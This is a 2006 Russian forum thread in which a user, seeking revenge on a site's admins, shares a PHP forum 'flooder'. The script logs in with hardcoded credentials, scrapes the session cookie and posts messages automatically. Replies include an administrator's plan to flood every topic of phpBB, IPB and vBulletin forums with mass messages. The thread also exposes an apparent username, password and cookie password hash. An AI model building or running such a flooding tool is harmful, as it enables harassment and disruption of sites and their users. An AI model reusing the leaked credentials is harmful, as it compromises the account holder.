1. Задавайте здесь вопросы о коде, которые не подходят в другие разделы, такие как:
    Дизайн > Верстка
    PHP > Как сделать на PHP
    Скрыть объявление

Пишу флудер. Нужна ваша помощь

Тема в разделе "Web Coding", создана пользователем cyberface, 19 июл 2006.

Статус темы:
Закрыта.
Модераторы: latteo
  1. cyberface

    cyberface Создатель

    Регистр.:
    26 мар 2006
    Сообщения:
    23
    Симпатии:
    3
    В общем, разозлили меня аджмины одного сайта своим надменным презрением, и я хочу им отомстить в качестве мести выбрал флуд.
    В целях конспирации (мало ли какие в инете найдуца шестерки)
    адрес сайта, а также все URI изменены

    Код:
    <?php
    
    # 
    # Script to flood 
    # 
    $hostname = "site.ru"; 
    $path = "/login/"; 
    $SID;
    
    $fp = fsockopen($hostname, 80, $errno, $errstr, 30); 
    
    
    
    if (!$fp) {
        echo "$errstr ($errno)<br />\n"; 
    }
    else {
        echo "Success<br />\n";
          
    
        #
        # Блок авторизации 
        #
    
        
       $data ="name=".urlencode("Maxigan")."&password=".urlencode("cfbebdeb")."&\r\n\r\n"; 
        $headers = "POST $path HTTP/1.1\r\n"; 
        $headers .= "Host: $hostname\r\n"; 
        $headers .= "Content-type: application/x-www-form-urlencoded\r\n";
        $headers .= "Accept: *\r\n"; 
        $headers .= "Accept-Charset: *\r\n"; 
        $headers .= "Accept-Encoding: deflate\r\n"; 
        $headers .= "Accept-Language: ru\r\n"; 
        $headers .= "User-Agent: Opera/8.01 (Windows NT 5.1; U; ru)\r\n"; 
        $headers .= "Content-Length: ".strlen($data)."\r\n\r\n"; 
    
        $fw = fwrite($fp, $headers.$data);
        
        if(!$fw)
        echo "Bad<br />\n";
        else 
        echo "Success<br />\n";
        sleep(1);
    
        while (!feof($fp))
        {  
            $line = fgets($fp, 1024);
            echo $line;  
            // Ищем строку вида  
            // Set-Cookie: PHPSESSID=6197e647566bdaa24da3ab42ae7604b2; 
            // Именно она устанавливает cookie 
            preg_match("|Set-Cookie: PHPSESSID=([\d\w]+);|i",$line,$out); 
            
            if(!empty($out[1]))
            { 
              global $SID;
              $SID = $out[1];
              echo $SID;           
            }      
      
            
        }  
    
           
           
           
           
        #
        # Блок отправки сообщения
        # 
        /*
        $path = "/talk/reply/";
        $hostname = "forums.site.ru"; 
           
        $data     = "body=".urlencode("preved")."&id_topic=".urlencode("126089"); 
        $headers  = "POST $path HTTP/1.1\r\n"; 
        $headers .= "Host: $hostname\r\n"; 
        $headers .= "Content-type: application/x-www-form-urlencoded\r\n";    
        $headers .= "Cookie: UID=90024; PASSWORD=172d53988c1c05ae22f72874d009639b\r\n"; 
        $headers .= "Content-Length: ".strlen($data)."\r\n\r\n";
         
    
        $fw = fwrite($fp, $headers.$data);
        
        if(!$fw)
        echo "Bad<br />\n";
        else 
        echo "Success<br />\n";
           
           
        while(!feof($fp))
        echo fgets($fp,1000); 
        */
    }
    
    
    ?>

    Клюки наблюдаются сразу после отправки заголовков для авторизации.
    Например, если изменить имя или пароль на несуществующие, то страница /login/ загрузится нормально, только там будет сказано, что я ввел неправильно имя или пароль.
    Если имя или пароль в скрипте введены правильно, то придут следующие заголовки:

    HTTP/1.1 301 Moved Permanently Date: Wed, 19 Jul 2006 10:03:25 GMT Server: Apache/1.3.34 (Unix) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Encoding: deflate Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Vary: Accept-Encoding X-Powered-By: PHP/5.1.4
    Set-Cookie: PHPSESSID=hbebbgmag4520u9rmslqhhj560; path=/; domain=site.ru
    Set-Cookie: UID=2013034054; expires=Sat, 16-Jul-2016 10:03:25 GMT; path=/; domain=site.ru Set-Cookie: UID=90024; expires=Fri, 18-Aug-2006 10:03:25 GMT; path=/; domain=site.ru Set-Cookie: PASSWORD=172d53988c1c05ae22f72874d009639b; expires=Wed, 26-Jul-2006 10:03:25 GMT; path=/; domain=site.ru Cache-Control: max-age=0 Expires: Wed, 19 Jul 2006 10:03:25 GMT Last-Modified: Wed, 19 Jul 2006 10:03:25 GMT Location: http://www.site.ru Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=windows-1251 d xњ

    C чем может быть связана ошибка 301? Что неправильно в коде?
     
  2. bbfy

    bbfy Создатель

    Регистр.:
    18 июл 2006
    Сообщения:
    45
    Симпатии:
    2
    Вот хороший линк http://www.checkupdown.com/status/E301.html
    к сожелению на англиском, на русском не нашел, да и не искал в принципе ) если надо то могу перевести :()
     
  3. GoNZo

    GoNZo Прохожие

    Ой несмеши скрипт флуда на пхп :D такое должно быть написанно на перле
     
  4. someone

    someone сисадмин всея 0ed

    Administrator
    Регистр.:
    3 апр 2006
    Сообщения:
    330
    Симпатии:
    375
    ты бы лучше подкинул если имеешь чтото готовое......
     
  5. ViD

    ViD Бигбосс

    Регистр.:
    13 апр 2006
    Сообщения:
    221
    Симпатии:
    225
    объясните что должен делать флудер
    и есть ли на сайте капча?! могу помочь написать
     
  6. someone

    someone сисадмин всея 0ed

    Administrator
    Регистр.:
    3 апр 2006
    Сообщения:
    330
    Симпатии:
    375
    Начну с капчи - пока не надо об этом думать.

    Для начала имеет смысл рассматривать задачу регистрации и постинга или только постинга (по имеющемуся логину-пассу) в оговоренное количество топиков или разделов форума.

    Или тщательно зафлудивание всех доступных топиков конкретного форума указанным количеством мессаг.

    Содержимое мессаг может быть как одно на всех, так и случайнов выбраное из некоего заготовленного списка.

    И ориентироваться надо на самые популярные форумы в порядке
    1) пхпбб
    2) инвижин
    3) вбуллетень
     
  7. ViD

    ViD Бигбосс

    Регистр.:
    13 апр 2006
    Сообщения:
    221
    Симпатии:
    225
    так такое пишется за час-два...
    Но только практической пользы не вижу...
    Поэтому не возьмусь.
     
Статус темы:
Закрыта.